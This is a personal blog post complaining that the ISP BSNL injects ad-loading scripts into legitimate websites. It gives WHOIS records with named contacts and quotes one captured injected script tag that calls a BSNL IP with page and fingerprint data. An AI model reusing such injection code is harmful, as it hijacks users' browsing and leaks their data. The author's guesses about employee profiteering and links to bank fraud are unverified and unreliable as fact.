see updated info at the end.(new officially spamming IP of BSNL is 117.254.84.212).
I am extremely paranoid to see automatic pop-ups to dangerous advertisement sites like newsprofin, cobalten etc . I am using legitimate websites like onecsir.res.in (our ERP site), nmlcsir.attendance.gov.in (GoI Biometric attendance e.g AeBAS site). But sometimes when I touch a click button or scrollbar or any other navigation button the ad popup comes up with malicious website.
I tried many things like reseting browser scanning with antivirus etc. but with no results.
I worried too much and uninstalled almost all software from my PC, all my licensed software like Texas instruments development tools and modules, Intel compilers and drivers, Cosmic Software, STM development tools, Visual Studio etc…. Run almost all available antivirus on the Internet to find “no virus found” or false detections like “CCleaner as a trojan” or a “VS tool as FakeMS”. I remove those also but still getting the nonsense popups.
Now I do not have even the printer,scanner, audio or video driver in the system.
STILL GETTING THE NEWSPROFIN AND COBALTEN. Extremely irritated lost more than two weeks. What the hell our licensed business version of Kaspersky is doing? Why to blame only kaspersky, I failed to remove these even using other antiviruses like quickheal, bitdefender, quihoo360, Avira …. all antispyware like AdAware, SpyHunter, RKill ……
I doubted the DNS spoofing so installed unbound and configured using cloudflare dns. But using it did not resolve the issue. I thought I have to configure it for the lab, at a letter stage to avoid any DNS spoofing.
At Last found some rascal siting at BSNL (our ISP) is doing the menace. I installed a very old tool as a proxy to intercept all urls, IPs, headers and data flowing from/to my browser. Two observations to surprises me
1. Whenever starting chrome number of random url queries gets generated with various different names and DNS is failing to provide any IP and these are not successful to fetch any data.
Find out on googling that this is a normal behavior of Chrome to test its working internally.
2. The sites above are trying to fetch some url(script) from a BSNL IP 117.245.143.67 which in turn going to get these advertisements. A script was injected to original contents in the header.
Quite surprising two different sites trying to fetch same IP.
Then I tried to get whats common !!! Its both are using flash . Tried to check with other flash site and found that also trying to get scripts from SAME IP!!!!!!!!!
See screen shots below. No doubt some BSNL Employee or Contractor/Vendor maybe earning HUGE MONEY by modifying the traffic of legitimate website and injecting these scripts to fetch Advertisements. But its giving control through script embedding in same legitimate web page.
I have got such redirected pop-up even from ICICI Bank website ….. its too dangerous….. Its sending many information to advertiser website including website you are accessing , location, username etc….
When the script is called from same webpage ( As the script was injected in same page ), if you a developer you can imagine what can be done. The content of the script has full control over the page and its variables. The Password or Username can be easily fetched or modified.
Do I need to say more..
WHOM TO COMPLAINT I DO NOT KNOW. How many people understand these technological terms/issues. Who will take these legal issues.
Such modification and injection of malicious script by ISP is heinous crime, can anyone take this legally, how to get and preserve evidences.
There are three cases of bank fraud recently at CSIR-NML, I do not know if these are connected/related. One of my financial site locked my password due to too many invalid login attempts. I reset and changed password but they do not divulge the source IP of the defaulter.
After getting URL I searched google with “getjs?nadipdata” to find following reference information (earlier I was searching with newsprofin and cobalten words to land up in wrong sites with cleanup instructions):
https://www.quora.com/profile/Shiv-Kumar-148
https://stackoverflow.com/questions/51064933/unknown-scripts-are-running-and-redirecting-on-click-to-unknown-websties
https://www.abuseipdb.com/check/117.245.143.67
http://ddecode.com/hexdecoder/?results=e49a704a3dad51b190f3f83b78427cc8
https://security.stackexchange.com/questions/157828/my-isp-bsnl-india-is-injecting-ads-using-phozeca-which-spoils-websites-and-mak
https://www.liveipmap.com/117.245.143.67
https://gist.github.com/asdofindia
https://bgjir.wordpress.com/tag/malware/
https://tutel.me/c/programming/questions/51064933/unknown+scripts+are+running+and+redirecting+on+click+to+unknown+websties
I do not know BSNL needs how much proof to take serious action on the owner of IP 117.245.143.67.
Such episode are really painful, I lost my peace of mind for more than two weeks. Still do not know what to do ? When your ISP does such things what you can do ?
Here are some captured screen shots (IP owner info below):
IP Owner Information as per ICAAN Record:
inetnum: 117.245.128.0 - 117.245.143.255
netname: BSNL-GSM-NorthZone
descr: BSNL GSM North Zone, O/o Sr GM (CMTS), NC, Chandigarh
country: IN
admin-c: JS2127-AP
tech-c: RV131-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MAINT-IN-DOT
mnt-irt: IRT-BSNL-IN
last-modified: 2014-12-02T09:38:12Z
source: APNIC
irt: IRT-BSNL-IN
address: Internet Cell
address: Bharat Sanchar Nigam Limited
address: 8th Floor,148-B Statesman House
address: Barakhamba Road, New Delhi - 110 001
e-mail: abuse@bsnl.in
abuse-mailbox: abuse@bsnl.in
admin-c: NC83-AP
tech-c: CGMD1-AP
auth: # Filtered
mnt-by: MAINT-IN-DOT
last-modified: 2017-10-20T05:42:50Z
source: APNIC
person: Jitender Setia
address: Addl GM (P&A), O/o Sr GM (CMTS), NC, Chandigarh
country: IN
phone: +91-172-2271033
fax-no: +91-172-2271033
e-mail: dgmdevnc@gmail.com
nic-hdl: JS2127-AP
mnt-by: MAINT-IN-PER-DOT
last-modified: 2012-12-10T09:50:52Z
source: APNIC
person: Rajiv Verma
address: SDE (IN-Opn-III), O/o Sr GM (CMTS), NC, Chandigarh
country: IN
phone: +91-172-2271033
fax-no: +91-172-2271033
e-mail: rajiv6789@gmail.com
nic-hdl: RV131-AP
mnt-by: MAINT-IN-PER-DOT
last-modified: 2012-12-10T09:51:08Z
source: APNIC
route: 117.245.128.0/20
descr: BSNL Internet
country: IN
origin: AS9829
mnt-lower: MAINT-IN-DOT
mnt-routes: MAINT-IN-DOT
mnt-by: MAINT-IN-AS9829
last-modified: 2008-09-04T07:55:07Z
source: APNIC
Update 04Sep2019 : BSNL now injecting the following script:
<script async="" src="//117.254.84.212:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjquery-1.11.3.min.js%22%2C%22referer%22:%22http:%2F%2Fwww.vizzed.com%2Fboards%2Fthread.php%3Fid%3D72161%22%2C%22host%22:%22www.vizzed.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%2C%22nadipdomain%22:1%2C%22policyid%22:0%7D"&screenheight=1080&screenwidth=1920&tm=1567601038449&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>